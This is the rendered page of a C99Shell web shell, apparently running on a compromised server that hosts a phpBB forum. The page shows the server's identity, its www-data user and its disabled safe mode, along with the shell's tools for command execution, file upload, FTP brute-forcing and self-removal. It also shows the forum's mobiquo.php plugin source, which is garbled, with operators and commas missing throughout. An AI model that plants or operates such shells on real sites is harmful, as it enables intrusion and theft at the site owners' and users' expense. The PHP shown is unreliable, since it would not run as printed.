!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/nginx/html/phpbb3/mobiquo/   drwxrwxr-x
Free 83.35 GB of 96.73 GB (86.17%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     mobiquo.php (1.56 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
*
* @copyright (c) 2009 Quoord Systems Limited
* @license http://opensource.org/licenses/gpl-license.php GNU Public License
*
*/

define('IN_PHPBB'true);
define('IN_MOBIQUO'true);

require(
'./config/config.php');
$mobiquo_config get_mobiquo_config();
$phpEx $mobiquo_config['php_extension'];

$phpbb_root_path dirname(dirname(__FILE__)).'/';
include(
$phpbb_root_path 'common.' $phpEx);
include(
$phpbb_root_path 'includes/functions_display.' $phpEx);

error_reporting(0);
@
ob_start();

// Start session management
$user->session_begin();
$auth->acl($user->data);
$user->setup('viewforum');

if(
$user->data['is_registered'])
{
    
header('Mobiquo_is_login:true');
} else {
    
header('Mobiquo_is_login:false');
}

if (
$user->data['user_new_privmsg'])
{
    include_once(
$phpbb_root_path 'includes/functions_privmsgs.' $phpEx);
    
place_pm_into_folder($global_privmsgs_rules);
}

include(
'./include/xmlrpc.inc');
include(
'./include/xmlrpcs.inc');

require(
'./error_code.php');
require(
'./mobiquo_common.php');
require(
'./server_define.php');

error_reporting(0);

$phpbb_home generate_board_url().'/';
$request_method_name get_method_name();
if (
$request_method_name && isset($server_param[$request_method_name]))
{
    require(
'./function/'.$request_method_name.'.php');
}

ob_get_clean();
$rpcServer = new xmlrpc_server($server_paramfalse);
$rpcServer->setDebug(1);
$rpcServer->compress_response 'true';
$rpcServer->response_charset_encoding 'UTF-8'

$response $rpcServer->service();

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0033 ]--